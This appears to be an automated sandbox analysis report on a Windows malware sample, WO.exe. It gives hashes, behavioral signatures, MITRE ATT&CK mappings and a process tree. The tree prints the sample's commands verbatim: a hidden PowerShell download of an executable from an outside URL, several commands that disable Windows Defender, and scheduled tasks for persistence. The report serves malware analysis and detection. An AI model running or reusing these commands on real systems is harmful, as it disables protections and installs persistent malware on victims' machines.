Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
23-12-2024 18:53
Static task
static1
Behavioral task
behavioral1
Sample
WO.exe
Resource
win7-20240903-en
General
-
Target
WO.exe
-
Size
126KB
-
MD5
7176b040816932541eb9c2b91d90b29b
-
SHA1
137a9c4620366caff2a1d1c297b6ae8c6d28761d
-
SHA256
db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95
-
SHA512
1332645e8c6b53994b4f3f28b980c1fe646cec1771e77982a85ec4036725f4f2930bd9a45caea8a03b8a8ece0b432955b0d55e09396f5a80fd7c0d2825b0d1de
-
SSDEEP
3072:a2sMWkzbJh1qZ9QW69hd1MMdxPe9N9uA0hu9TBfcX011:7bJhs7QW69hd1MMdxPe9N9uA0hu9TBZn
Malware Config
Extracted
https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
Blocklisted process makes network request 6 IoCs
flow pid Process 5 2748 powershell.exe 6 2748 powershell.exe 8 1560 powershell.exe 9 1560 powershell.exe 11 1444 powershell.exe 12 1444 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell and hide display window.
pid Process 2748 powershell.exe 1560 powershell.exe 1444 powershell.exe 2460 powershell.exe 1332 powershell.exe 2792 powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 2016 WO.exe 316 WO.exe -
Loads dropped DLL 1 IoCs
pid Process 2844 taskeng.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2756 sc.exe 1960 sc.exe 1716 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2636 schtasks.exe 2548 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2792 powershell.exe 2748 powershell.exe 2460 powershell.exe 1560 powershell.exe 1332 powershell.exe 1444 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 2792 powershell.exe Token: SeDebugPrivilege 2748 powershell.exe Token: SeDebugPrivilege 2460 powershell.exe Token: SeDebugPrivilege 1560 powershell.exe Token: SeDebugPrivilege 1332 powershell.exe Token: SeDebugPrivilege 1444 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1860 wrote to memory of 2296 1860 WO.exe 28 PID 1860 wrote to memory of 2296 1860 WO.exe 28 PID 1860 wrote to memory of 2296 1860 WO.exe 28 PID 2296 wrote to memory of 2792 2296 cmd.exe 30 PID 2296 wrote to memory of 2792 2296 cmd.exe 30 PID 2296 wrote to memory of 2792 2296 cmd.exe 30 PID 2296 wrote to memory of 2748 2296 cmd.exe 31 PID 2296 wrote to memory of 2748 2296 cmd.exe 31 PID 2296 wrote to memory of 2748 2296 cmd.exe 31 PID 2296 wrote to memory of 2960 2296 cmd.exe 32 PID 2296 wrote to memory of 2960 2296 cmd.exe 32 PID 2296 wrote to memory of 2960 2296 cmd.exe 32 PID 2296 wrote to memory of 2848 2296 cmd.exe 33 PID 2296 wrote to memory of 2848 2296 cmd.exe 33 PID 2296 wrote to memory of 2848 2296 cmd.exe 33 PID 2296 wrote to memory of 2636 2296 cmd.exe 34 PID 2296 wrote to memory of 2636 2296 cmd.exe 34 PID 2296 wrote to memory of 2636 2296 cmd.exe 34 PID 2296 wrote to memory of 2672 2296 cmd.exe 35 PID 2296 wrote to memory of 2672 2296 cmd.exe 35 PID 2296 wrote to memory of 2672 2296 cmd.exe 35 PID 2296 wrote to memory of 2548 2296 cmd.exe 36 PID 2296 wrote to memory of 2548 2296 cmd.exe 36 PID 2296 wrote to memory of 2548 2296 cmd.exe 36 PID 2296 wrote to memory of 2756 2296 cmd.exe 37 PID 2296 wrote to memory of 2756 2296 cmd.exe 37 PID 2296 wrote to memory of 2756 2296 cmd.exe 37 PID 2296 wrote to memory of 2496 2296 cmd.exe 38 PID 2296 wrote to memory of 2496 2296 cmd.exe 38 PID 2296 wrote to memory of 2496 2296 cmd.exe 38 PID 2496 wrote to memory of 2516 2496 net.exe 39 PID 2496 wrote to memory of 2516 2496 net.exe 39 PID 2496 wrote to memory of 2516 2496 net.exe 39 PID 2296 wrote to memory of 2532 2296 cmd.exe 40 PID 2296 wrote to memory of 2532 2296 cmd.exe 40 PID 2296 wrote to memory of 2532 2296 cmd.exe 40 PID 2296 wrote to memory of 2564 2296 cmd.exe 41 PID 2296 wrote to memory of 2564 2296 cmd.exe 41 PID 2296 wrote to memory of 2564 2296 cmd.exe 41 PID 2844 wrote to memory of 2016 2844 taskeng.exe 45 PID 2844 wrote to memory of 2016 2844 taskeng.exe 45 PID 2844 wrote to memory of 2016 2844 taskeng.exe 45 PID 2016 wrote to memory of 324 2016 WO.exe 46 PID 2016 wrote to memory of 324 2016 WO.exe 46 PID 2016 wrote to memory of 324 2016 WO.exe 46 PID 324 wrote to memory of 2460 324 cmd.exe 48 PID 324 wrote to memory of 2460 324 cmd.exe 48 PID 324 wrote to memory of 2460 324 cmd.exe 48 PID 324 wrote to memory of 1560 324 cmd.exe 49 PID 324 wrote to memory of 1560 324 cmd.exe 49 PID 324 wrote to memory of 1560 324 cmd.exe 49 PID 324 wrote to memory of 2008 324 cmd.exe 50 PID 324 wrote to memory of 2008 324 cmd.exe 50 PID 324 wrote to memory of 2008 324 cmd.exe 50 PID 324 wrote to memory of 1992 324 cmd.exe 51 PID 324 wrote to memory of 1992 324 cmd.exe 51 PID 324 wrote to memory of 1992 324 cmd.exe 51 PID 324 wrote to memory of 2004 324 cmd.exe 52 PID 324 wrote to memory of 2004 324 cmd.exe 52 PID 324 wrote to memory of 2004 324 cmd.exe 52 PID 324 wrote to memory of 1960 324 cmd.exe 53 PID 324 wrote to memory of 1960 324 cmd.exe 53 PID 324 wrote to memory of 1960 324 cmd.exe 53 PID 324 wrote to memory of 2100 324 cmd.exe 54 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 2960 attrib.exe 2008 attrib.exe 2164 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\WO.exe"C:\Users\Admin\AppData\Local\Temp\WO.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1860 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5A31.tmp\5A32.tmp\5A33.bat C:\Users\Admin\AppData\Local\Temp\WO.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2296 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2792
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\Admin\AppData\Local\Temp\reddit.exe')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2748
-
-
C:\Windows\system32\attrib.exeattrib -h "C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe"3⤵
- Views/modifies file attributes
PID:2960
-
-
C:\Windows\system32\schtasks.exeschtasks /query /TN "RunRedditLogon"3⤵PID:2848
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "RunRedditLogon" /tr "C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe" /sc onlogon /rl highest /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:2636
-
-
C:\Windows\system32\schtasks.exeschtasks /query /TN "RunRedditMinute"3⤵PID:2672
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "RunRedditMinute" /tr "C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe" /sc minute /mo 1 /rl highest /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:2548
-
-
C:\Windows\system32\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:2756
-
-
C:\Windows\system32\net.exenet stop WinDefend3⤵
- Suspicious use of WriteProcessMemory
PID:2496 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵PID:2516
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2532
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2564
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {167A4F3A-BF8D-4892-840F-E7A45BC0314D} S-1-5-21-3533259084-2542256011-65585152-1000:XPAJOTIY\Admin:Interactive:[1]1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exeC:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2C5E.tmp\2C5F.tmp\2C60.bat C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:324 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2460
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\Admin\AppData\Local\Temp\reddit.exe')"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1560
-
-
C:\Windows\system32\attrib.exeattrib -h "C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe"4⤵
- Views/modifies file attributes
PID:2008
-
-
C:\Windows\system32\schtasks.exeschtasks /query /TN "RunRedditLogon"4⤵PID:1992
-
-
C:\Windows\system32\schtasks.exeschtasks /query /TN "RunRedditMinute"4⤵PID:2004
-
-
C:\Windows\system32\sc.exesc config WinDefend start= disabled4⤵
- Launches sc.exe
PID:1960
-
-
C:\Windows\system32\net.exenet stop WinDefend4⤵PID:2100
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WinDefend5⤵PID:2076
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵PID:2368
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:2596
-
-
-
-
C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exeC:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe2⤵
- Executes dropped EXE
PID:316 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\162F.tmp\1630.tmp\1631.bat C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe"3⤵PID:1328
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1332
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\Admin\AppData\Local\Temp\reddit.exe')"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1444
-
-
C:\Windows\system32\attrib.exeattrib -h "C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe"4⤵
- Views/modifies file attributes
PID:2164
-
-
C:\Windows\system32\schtasks.exeschtasks /query /TN "RunRedditLogon"4⤵PID:2896
-
-
C:\Windows\system32\schtasks.exeschtasks /query /TN "RunRedditMinute"4⤵PID:1320
-
-
C:\Windows\system32\sc.exesc config WinDefend start= disabled4⤵
- Launches sc.exe
PID:1716
-
-
C:\Windows\system32\net.exenet stop WinDefend4⤵PID:1520
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WinDefend5⤵PID:996
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵PID:3032
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:2084
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5c0e9bc2dfff6e08df8196809b9bbf253
SHA1006e88ea359145c40a6bbca55e6f21b387999255
SHA25643c1dfafac6c340f420057606f317c2d0d3182c04f1a9c76b782f818c85f4f11
SHA5125b0c012aca5479bf3b8852e1504465ccb2ad6ce4134ee8d2ad57c898fd91ac19f96a669ebc3a9201e65099ed1723f4515b48ca25ea21681ad45377ce3d9ca60c
-
Filesize
126KB
MD57176b040816932541eb9c2b91d90b29b
SHA1137a9c4620366caff2a1d1c297b6ae8c6d28761d
SHA256db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95
SHA5121332645e8c6b53994b4f3f28b980c1fe646cec1771e77982a85ec4036725f4f2930bd9a45caea8a03b8a8ece0b432955b0d55e09396f5a80fd7c0d2825b0d1de
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD564cd7615418c0d0c7e54625e2357a8a9
SHA10e6b62667ba4dbfbb3c694bea2062893bd2cd628
SHA256f540158992a802230f3453f93e32f6dc3d5f32f1dd68861e8e204ef4d8291a05
SHA512602560baa8fea3a1eaedff19fcdb52394d881b7e8724e79e36287acb861eb766c2c7311a787dbcdb9ce49e9855afbce643167f76f4ca9ae2d3016ef22356703c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5c9a5c2e3f020c0fb9f5ddfdbbbb8ed7d
SHA1ff7730feb60cd5c3d09ac49bf00d2fc7ad6f38a5
SHA25612a8cf8a003c039192e95d4ad3475bd34d54279efc738eb06913110cf2355c6b
SHA512b848a95a44b45e3c97817838aeaad8c33e7c8c3d7c18e1b12b9e61cc74031490f57f63aa870a5577340ace42ad254652f86af6e09a938b1a43b9f8b87daf06c8